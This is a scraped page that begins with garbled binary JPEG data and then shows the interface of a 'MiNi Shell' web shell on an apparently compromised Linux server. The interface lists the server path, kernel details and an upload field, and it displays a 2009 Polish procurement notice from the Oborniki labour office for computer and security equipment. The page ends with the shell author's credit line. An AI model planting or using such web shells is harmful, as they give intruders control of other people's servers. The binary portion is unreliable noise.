JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090828/298088-N-2009.html

<p class="kh_header"><b>Oborniki: Zakup sprzętu komputerowego, oprogramowania, akcesoriów komputerowych oraz tonerów wraz z dostawą</b><br>
<b>Numer ogłoszenia: 298088 - 2009; data zamieszczenia: 28.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Obornikach , ul. Sądowa 5, 64-600 Oborniki, woj. wielkopolskie, tel. 0-61 653 66 36, faks 0-61 653 66 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.obornikiwlkp.ibip.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu komputerowego, oprogramowania, akcesoriów komputerowych oraz tonerów wraz z dostawą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zasilacz awaryjny UPS do komputerów PC , 3 szt ; Klasa produktu	UPS - zasilacz awaryjny ; Moc pozorna	700 VA ; Moc rzeczywista	420 Wat
2.	Zasilacz awaryjny UPS do serwera ; Klasa produktu	UPS - zasilacz awaryjny ; Moc pozorna	1500 VA ; Moc rzeczywista	980 Wat
3.	Dysk twardy 3,5 , 6 szt ; Klasa produktu	Dysk twardy ; Rodzaj dysku	Standardowy (nośnik magnetyczny) ; Format szerokości	3,5 cali
4.	Nagrywarka DVD-RW , 4 szt ; Klasa produktu	Wewnętrzny napęd optyczny (desktop) ; Funkcja napędu optycznego	odczyt + zapis ; Technologia optyczna (zapis)	CD/DVD
5.	Skaner płaski biurkowy, szt. 4 ;Klasa produktu	Skaner ; Klasa skanera	 -  A4
	 -  FAU/TPU (przystawka do skanowania filmów)
Obszar zastosowań -  domowy-  biurowy
Typ skanera -  płaski -  kolorowy -  stolikowy
6.	Switche 16 portowe, zarządzane - 2 szt. ; Klasa produktu	SWITCH przełącznik sieciowy zarządzalny ; Architektura sieci LAN	FastEthernet ; Liczba portów 10/100BaseTX (RJ45)	16 szt.
7.	System kompleksowej ochrony sieci komputerowej, szt. 1 ; System musi posiadać zintegrowaną architekturę bezpieczeństwa - w jednym urządzeniu realizuje następujące funkcje: 
o	[FW]	Zapora Ogniowa / Firewall Stateful Inspection
o	[AV]	Antywirus
o	[IDP]	System detekcji i prewencji włamań (IPS+IDS)
o	[VPN]	Szyfracji danych: IPSec
o	[AS]	Filtrację SPAMu (Antyspam)
o	[WF]	Filtrację stron www (Web Filter)
o	[IM/P2P] Kontrola komunikatorów (IM) i aplikacji P2P
o	[DLP] Ochrona przed wypływem informacji z wewnątrz intytucji
o	Kontrola aplikacji oparta na sygnaturach charakterystyki ruchu (min.1000 zdefiniowanych aplikacji)
8.	System logowania oraz raportowania, szt. 1
9.	Płyty DVD+R w kopercie bez okienka, 250 szt. ; Rodzaj nośnika:	DVD+R ; Pojemność: 	4,7 GB ; Prędkość nagrywania: 	1x-16x
10.	Płyty CD-R  w kopercie bez okienka, 150 szt ; Rodzaj nośnika:	CD-R ; Pojemność:		700 MB ; Prędkość nagrywania: 	od 1x do 52x
11.	System zdalnego monitoringu serwerowni, liczba zestawów: 1 ; Urządzenie monitorujące wraz z czujnikami
12.Przedłużenie licencji (na 12 miesięcy) na moduły  w urządzeniu Fortigate 60B ; Przedłużenie na moduły:
- AV - AntiVirus
- IPS - Intrusion Protection
-Web Filtering
- AntiSpam
13.	System antywirusowy NOD32 - wznowienie 25 licencji
14.	System antywirusowy NOD32 - dokupienie 10 licencji
15.	Zasilacze komputerowe ATX , szt. 8  ; Złącza PCIX / SATA / Molex / Floppy/ 4 pin CPU:	2 / 3 / 5 / 1 / 1 ; Wentylator [mm]: 		120
16.	Oprogramowanie do tworzenia i przywracania kopii zapasowych dysków danych
17.	Zewnętrzny napęd dyskietek 3,5 na USB, szt. 2
18.	Tonery do drukarek laserowych
19.	Licencje na program Total Commander, szt. 3 ; klasa produktu	menedżer plików ; rodzina	Total Commander ; typ licencji	komercyjna
20.	Komputery PC , szt. 3 ; Płyta główna	Zaprojektowana na zlecenie producenta jednostki centralnej komputera, wyposażona w 1 złącze PCI Express x16, 2 wolne złącza PCI, 1 złącze PCI Express x1, 4 złącza DIMM, obsługa do 4GB pamięci RAM, 4 złącza SATA, 1 złącze eSATA; płyta musi być trwale oznaczona logo producenta komputera
20.	Monitory LCD , 2 szt.
21.	System operacyjny Windows XP Professional SP3 BOX , 4 licencje z nośnikiem
22.	Pamięć RAM do serwerów, szt. 8 

Dostarczone urządzenia muszą być fabrycznie nowe, wyprodukowane nie wcześniej niż rok przed złożeniem oferty.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.41.00-9, 30.19.21.13-6, 30.21.62.10-0, 32.42.00.00-3, 32.41.31.00-2, 30.23.73.80-6, 35.12.51.00-7, 72.54.00.00-2, 48.76.00.00-3, 30.23.72.00-1, 48.71.00.00-8, 30.23.00.00-0, 48.78.00.00-9, 30.21.30.00-5, 30.23.13.00-0, 48.62.40.00-8, 30.23.61.11-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> -<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. - Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), czyli:
a)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	Posiadają niezbędną wiedzę i doświadczenie,
c)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
2)	Ocena spełnienia warunków  udziału w postępowaniu odbędzie się na podstawie złożonych oświadczeń i wynikających z nich informacji zgodnie z formułą spełnia - nie spełnia. Z treści załączonych dokumentów wymienionych w pkt 6 musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.)	Oświadczenie , że Wykonawca spełnia warunki art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych i nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - (wzór -  załącznik nr 1 do SIWZ)
2.)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału             w postępowaniu o udzielenie zamówienia albo składania ofert.
3.)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem składania wniosków                 o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
4.)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 3 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub  miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania ( z zachowaniem terminu wystawienia j.w.). 
5.)	Wypełniony Formularz ofertowy (wzór - załącznik nr 2 do SIWZ).
6.)	Projekt umowy (wzór - załącznik nr 3 do SIWZ)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pupobornikiwlkp.ibip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Obornikach, ul. Sądowa 5, 64-600 Oborniki
Fax: 061 653 66 31 lub na adres e-mail: poob@praca.gov.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 13:00, miejsce: w siedzibie Urzędu tj. Powiatowy Urząd Pracy w Obornikach
ul. Sądowa 5 , 64-600 Oborniki , pokój 19, piętro II
UWAGA! 
Oferta złożona po terminie nie będzie rozpatrywana i będzie zwrócona Wykonawcy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com